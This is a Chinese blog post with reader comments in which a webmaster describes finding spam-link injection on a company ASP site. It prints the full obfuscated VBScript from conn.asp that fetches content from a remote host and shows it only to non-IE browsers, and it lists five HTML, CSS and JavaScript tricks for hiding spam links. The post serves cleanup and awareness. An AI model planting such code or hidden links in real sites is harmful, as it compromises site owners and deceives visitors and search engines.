公司网站前天又被挂黑链了,与之前有一次的情况一样。两横排黑链排在网站底部,用IE浏览器还根本看不到,查看源代码也看不见。还好我一直都用chrome浏览器,一开网站一看这下又杯具了。马上连上ftp,看一下最近修改的文件,和未知的文件。一眼望去,没有未知文件,查看最近修改的文件就只有一个数据库连接文件conn.asp和一个lanuage的语言文件。立马下载到本地,第一次打开看了一下都没发现问题,然后仔细看了下conn.asp里的代码,2段正常的函数也没神马问题,就在我准备关闭此文件时,瞅到一眼这串代码:
“h”&”t”&”t”&”p”&”:”&”/”&”/”&”y”&”d”&”7″&”6″&”9″&”.”&”c”&”n”&”/”&”l”&”i”&”n”&”k”&”/”&”0″&”1″&”.”&”a”&”s”&”p”&”?”&”i”&”d”&”=”&bl&”&website=”&website)
晕,罪魁祸首就是它了。然后仔细检查该段代码,揪出完整真凶了。
代码:
dim bl,website
website = Request.ServerVariables(“SERVER_NAME”)
Randomize
bl = INT(1000*RND)
Dim BrowserString
BrowserString = Request.ServerVariables( “HTTP_USER_AGENT”)
BrowserString = Lcase(BrowserString)
Dim broFirefox,broMSIE,broOpera,broWap
broMSIE = “msie ”
if Instr(BrowserString, broMSIE) = 0 then
On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage(“h”&”t”&”t”&”p”&”:”&”/”&”/”&”y”&”d”&”7″&”6″&”9″&”.”&”c”&”n”&”/”&”l”&”i”&”n”&”k”&”/”&”0″&”1″&”.”&”a”&”s”&”p”&”?”&”i”&”d”&”=”&bl&”&website=”&website))
Function getHTTPPage(url)
Dim Http
Set Http = CreateObject(“MSXML2.XMLHTTP”)
Http.Open “GET”, url, False
Http.send
If Http.ReadyState <> 4 Then
Exit Function
End If
getHTTPPage = BytesToBstr(Http.responseBody, “gb2312″)
Set Http = Nothing
If Err.Number <> 0 Then Err.Clear
End Function
Function BytesToBstr(body, Cset)
Dim objstream
Set objstream = CreateObject(“adodb.stream”)
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
end if
隐藏在复制的一段正常代码之中,虽然我不太懂ASP那些代码,有了以前查找黑链的一点小经验,还是很迅速的把它揪出来了。
公司那网站还是用的ASP,漏洞多啊,空间又不稳定,一天到晚问题多啊。话说要准备彻底改版了,看来又有得折腾的了。
在网上查了一下,一般挂黑链的方法,神马html,css,js之类的,这次碰见的居然是asp类型的,长见识了哟。
附赠常见挂黑链的方法(网上收集):
第一种 HTML:
<marquee height=”1″ width=”5″ scrollAmount=”3000″ scrollDelay=”20000″>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</marquee>
第二种 CSS1:
<div style=”position: absolute; top: -999px;left: -999px;”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>
第三种 CSS2:
<div style=”position:absolute;left:e-xpression(1-900);top:e-xpression(3-999);”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>
第四种 DIV:
<div style=”display:none;”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>
第五种 Javascript1:
<script language=”JavaScript” type=”text/javascript”>
document.write( “<div style=’display:none’>” );
</script>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
<script language=”JavaScript” type=”text/javascript”>
document.write( “</div>” );
</script>
PS:《双陈记》情侣博客建议各位童鞋还是踏踏实实的做SEO吧,毕竟黑链那东西最后都是会被K的,最后祝大家的站点的排名都节节攀升,流量攀升,广告费大赚,哈哈!
据说ASP漏洞很多,很容易被攻击。。。不过那啥没办法啊。。。只懂ASP而已。。。
可以试试WP吧,还是很给力的说!
那个地址是用一串的&连起来的,汗呀!
是啊,不注意差点没看到了
是啊asp挺杯具的,不过应该要换PHP的了
ok
学习了 有用!!谢谢分享
不客气哈,共同学习!
黑客方面的东西玩了很久了,辟谣一下。ASP PHP任何语言都是好的,是写代码的人的问题。ASP一般SQL注入漏洞,上传 解析 XSS 等都是由于写代码的人的问题。网站被挂黑链,首先查IIS日志,修补漏洞。清理黑链没用。此外后门其实就一句话而已,插到正常文件中 肉眼是找不到的